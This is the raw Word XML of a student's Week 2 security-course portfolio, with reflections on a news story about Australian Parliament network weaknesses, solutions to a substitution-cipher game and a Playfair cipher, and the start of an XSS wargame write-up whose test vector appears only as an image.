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8BC7" w14:textId="619962E5" w:rsidR="6D397BBD" w:rsidRDefault="03443B3D" w:rsidP="50D93E6F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50D93E6F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>COMP6</w:t>
      </w:r>
      <w:r w:rsidR="7B3DB262" w:rsidRPr="50D93E6F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="50D93E6F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">41 Week 2 Portfolio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298E61B" w14:textId="08DC0676" w:rsidR="53ACB0B5" w:rsidRDefault="53ACB0B5" w:rsidP="53ACB0B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500802A7" w14:textId="1EFE7729"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 xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00316727">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Thomas Gosman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183241" w14:textId="2D69D96D" w:rsidR="6D397BBD" w:rsidRDefault="6D397BBD" w:rsidP="53ACB0B5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="53ACB0B5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>zID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="53ACB0B5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00316727">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> z5425064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324DF8CD" w14:textId="656D398A"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Date Submitted:</w:t>
      </w:r>
      <w:r w:rsidR="00316727">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00BF52D7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00316727">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/06/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD295C" w14:textId="0CF8183A" w:rsidR="50317446" w:rsidRDefault="6265B322" w:rsidP="53ACB0B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="53ACB0B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FA490" w14:textId="6BC05748" w:rsidR="50317446" w:rsidRDefault="6253BB17" w:rsidP="181B8E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidRPr="0F3AFA8F">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4069D393">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="449ED622" w14:textId="77777777" w:rsidR="004814B7" w:rsidRDefault="004814B7" w:rsidP="004814B7">
            <w:r>
              <w:t>While considering risks and secrets, I found an interesting news story about weaknesses in the Australian Parliament's network security. The article raises concerns that Parliament may not be managing these risks effectively, despite the potentially serious consequences of a breach. Phishing attacks continue to compromise the network, and a consultancy review has identified the need for major system upgrades.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C89A388" w14:textId="77777777" w:rsidR="004814B7" w:rsidRDefault="004814B7" w:rsidP="004814B7"/>
          <w:p w14:paraId="67534F54" w14:textId="77777777" w:rsidR="004814B7" w:rsidRDefault="004814B7" w:rsidP="004814B7">
            <w:r>
              <w:t>This issue can also be viewed through the lens of Type I and Type II errors. Parliament relies heavily on communication with external agencies, individuals, and foreign governments, so overly strict filtering could incorrectly block legitimate communications (false positives). However, maintaining a more open system increases the risk of malicious communications being accepted (false negatives), leaving the network vulnerable to phishing and other social engineering attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021728D4" w14:textId="77777777" w:rsidR="004814B7" w:rsidRDefault="004814B7" w:rsidP="004814B7"/>
          <w:p w14:paraId="47AFF8E3" w14:textId="60C3C67C" w:rsidR="008B71B2" w:rsidRDefault="004814B7" w:rsidP="004814B7">
            <w:r>
              <w:t xml:space="preserve">Overall, this demonstrates that security systems cannot simply be </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>optimised</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> for maximum restriction or maximum accessibility. Instead, they require careful risk assessment and a balance between security, usability, and operational requirements.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CB23A8" w14:textId="51A27ED4" w:rsidR="008B71B2" w:rsidRDefault="004814B7" w:rsidP="181B8E52">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B28ED00" wp14:editId="42232192">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1187450</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>48601</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3123028" cy="2080830"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="571868495" name="Picture 1" descr="More than 100,000 sensitive parliamentary emails and documents were handed to a private law firm despite internal warnings of an “extreme” cybersecurity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re than 100,000 sensitive parliamentary emails and documents were handed to a private law firm despite internal warnings of an “extreme” cybersecurity ris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23028" cy="2080830"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EEBFF19" w14:textId="3B900172" w:rsidR="4069D393" w:rsidRDefault="4069D393" w:rsidP="4069D393"/>
          <w:p w14:paraId="79F6B716" w14:textId="1A3C4EA4" w:rsidR="4069D393" w:rsidRDefault="00DB23B1" w:rsidP="4069D393">
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="007342DA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.smh.com.au/politics/federal/national-security-risk-as-parliamentary-network-fails-seven-out-of-eight-basic-cyber-checks-20260611-p6061j.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9BB07E" w14:textId="16349E02" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19BF2080" w14:textId="6D936089" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
    <w:p w14:paraId="4B139E6F" w14:textId="77777777" w:rsidR="004C57A0" w:rsidRDefault="004C57A0" w:rsidP="181B8E52"/>
    <w:p w14:paraId="26048E02" w14:textId="77777777" w:rsidR="004C57A0" w:rsidRDefault="004C57A0" w:rsidP="181B8E52"/>
    <w:p w14:paraId="7CBF13E0" w14:textId="73079A12" w:rsidR="50317446" w:rsidRDefault="15D4996E" w:rsidP="53ACB0B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="53ACB0B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C648BC" w14:textId="2C2B910B" w:rsidR="336AB2E5" w:rsidRDefault="5072935B" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="0F3AFA8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Decryption Game</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5FFD1882" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1B75A686" w14:textId="77777777" w:rsidR="0082010F" w:rsidRPr="0082010F" w:rsidRDefault="0082010F" w:rsidP="0082010F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:rPr>
                <w:kern w:val="2"/>
                <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>I began by looking for common patterns in English sentences.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B822B83" w14:textId="77777777" w:rsidR="0082010F" w:rsidRDefault="0082010F" w:rsidP="0082010F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Words like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>the</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>that</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>it</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> helped because they appear often and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>made</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> parts of the cipher easier to guess.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BCC0959" w14:textId="77777777" w:rsidR="0082010F" w:rsidRDefault="0082010F" w:rsidP="0082010F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Short words such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>it</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> were useful for working out individual letters.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8F5D1E" w14:textId="77777777" w:rsidR="0082010F" w:rsidRDefault="0082010F" w:rsidP="0082010F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>After identifying a few letters, I used repeated patterns and normal English spelling to narrow down the remaining options.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF4342B" w14:textId="77777777" w:rsidR="0082010F" w:rsidRDefault="0082010F" w:rsidP="0082010F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>This showed me that reusing a cipher or key can reveal patterns over time, making it easier to break.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45263542" w14:textId="2950142D" w:rsidR="005B1AC6" w:rsidRDefault="005B1AC6" w:rsidP="005B1AC6">
            <w:r w:rsidRPr="005B1AC6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0022DA65" wp14:editId="4B0EDF7C">
                  <wp:extent cx="5676422" cy="3005593"/>
                  <wp:effectExtent l="0" t="0" r="635" b="4445"/>
                  <wp:docPr id="1453133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3471" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5699147" cy="3017626"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="705E6C68" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="3A12450C" w14:textId="44D064C0" w:rsidR="181B8E52" w:rsidRDefault="005B1AC6" w:rsidP="181B8E52">
            <w:r w:rsidRPr="005B1AC6">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B5EE59" wp14:editId="23858295">
                  <wp:extent cx="5943600" cy="1883410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="49038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83039" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1883410"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FD38DD" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="545A12E6" w14:textId="0F5E94FC" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="638C50E3" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1607EE76" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="782C514D" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2AE2330A" w14:textId="199B297D" w:rsidR="181B8E52" w:rsidRDefault="181B8E52"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370E7EF7" w14:textId="2B85E369" w:rsidR="68CB2D18" w:rsidRDefault="0904C9C4" w:rsidP="0F3AFA8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="0F3AFA8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Classical Ciphers</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12F740F9" w14:textId="68C6F0DE" w:rsidR="181B8E52" w:rsidRDefault="00B16B5F" w:rsidP="181B8E52">
            <w:r>
              <w:t>Cipher: Playfair Cipher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57454786" w14:textId="3826F68B" w:rsidR="00B16B5F" w:rsidRDefault="00B16B5F" w:rsidP="181B8E52">
            <w:r>
              <w:t>Key: PSITHURISM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E7D396" w14:textId="15D10A8A" w:rsidR="00B16B5F" w:rsidRDefault="00B16B5F" w:rsidP="181B8E52">
            <w:r>
              <w:t>Encrypted: RKSAUFMDSTFRMSMO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C0E805" w14:textId="77777777" w:rsidR="00CA7CA2" w:rsidRDefault="00CA7CA2" w:rsidP="00865EBB">
            <w:r>
              <w:t>The most interesting part of the Playfair Cipher was how much it relies on the secrecy of the key grid. Once an attacker can make good guesses about parts of the message, the grid becomes much easier to reconstruct, which weakens the whole system. This shows how a single point of failure can make an encryption method vulnerable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E6429E" w14:textId="77777777" w:rsidR="001E4A1C" w:rsidRDefault="001E4A1C" w:rsidP="004A1E38"/>
          <w:p w14:paraId="7B7ED5D5" w14:textId="77777777" w:rsidR="00CA7CA2" w:rsidRDefault="00CA7CA2" w:rsidP="00515529">
            <w:r>
              <w:t>A major weakness is the human element. Messages often follow predictable formats, such as starting with “Dear [Name],” which can give attackers clues about the plaintext. Playfair was designed to be quick and practical to use, especially for decryption, but that convenience also made it weaker once enough patterns were known. In terms of type 1 and type 2 errors, the cipher reduces the chance of legitimate users failing to decrypt messages quickly, but it increases the risk that an attacker can break the message once they understand the grid.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A353AEA" w14:textId="69DA119F" w:rsidR="00B16B5F" w:rsidRDefault="0012036F" w:rsidP="181B8E52">
            <w:r w:rsidRPr="0012036F">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE2F0A1" wp14:editId="36363199">
                  <wp:extent cx="5943600" cy="4239895"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="65000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07601" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="4239895"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="005DA672" w14:textId="76B45979" w:rsidR="00B16B5F" w:rsidRDefault="00B16B5F" w:rsidP="181B8E52">
            <w:r>
              <w:t>Decrypted Word: Ultracrepidarian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455396D7" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="736EC525" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5AEE8E44" w14:textId="586FE207" w:rsidR="181B8E52" w:rsidRDefault="002C0ACC" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F3DBA38" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="18D9014C" w14:textId="1A9F3528" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1BE34A16" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2CD28604" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>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19228AC3" w14:textId="6F76AB44" w:rsidR="6E78A25E" w:rsidRDefault="167A1920" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="0F3AFA8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Project Proposal</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41AE5F47" w14:textId="09491E05" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="096B6636" w14:textId="06003F11" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BC28A9E" w14:textId="78C0DF41" w:rsidR="6E9B7AC1" w:rsidRDefault="6E9B7AC1" w:rsidP="6E9B7AC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DC3BC7" w14:textId="4C8EA4BE" w:rsidR="3D9C83D4" w:rsidRDefault="3D9C83D4" w:rsidP="6E9B7AC1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="270"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6E9B7AC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7629B" w14:textId="116830A8" w:rsidR="3D9C83D4" w:rsidRDefault="3D9C83D4" w:rsidP="6E9B7AC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidRPr="6E9B7AC1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Week 2 Extension Wargames</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="6E9B7AC1" w14:paraId="11310DB3" w14:textId="77777777" w:rsidTr="6E9B7AC1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A0CBF9" w14:textId="440E681F" w:rsidR="6E9B7AC1" w:rsidRDefault="6E9B7AC1" w:rsidP="6E9B7AC1"/>
          <w:p w14:paraId="51FE59CF" w14:textId="347FA0D9" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="6E9B7AC1">
            <w:r>
              <w:t xml:space="preserve">This </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>weeks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> wargames were to build on XSS attack strategies and learn critical vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08C7B434" w14:textId="77777777" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="6E9B7AC1"/>
          <w:p w14:paraId="1B503493" w14:textId="2F238466" w:rsidR="008B2D31" w:rsidRDefault="008B2D31" w:rsidP="008B2D31">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:r>
              <w:t>XSS 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CEBE536" w14:textId="320B5E48" w:rsidR="00D352DC" w:rsidRDefault="00D352DC" w:rsidP="00D352DC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">I initially tried to find the injection vulnerability point in the blog post of the server. Which could be done using a test vector below coming from an OWASP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cheatsheet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0474EA" w14:textId="792CB610" w:rsidR="6E9B7AC1" w:rsidRDefault="00D352DC" w:rsidP="6E9B7AC1">
            <w:r w:rsidRPr="00D352DC">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0B3C87" wp14:editId="032D4900">
                  <wp:extent cx="4225290" cy="2360930"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
                  <wp:docPr id="162224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4692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25290" cy="2360930"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
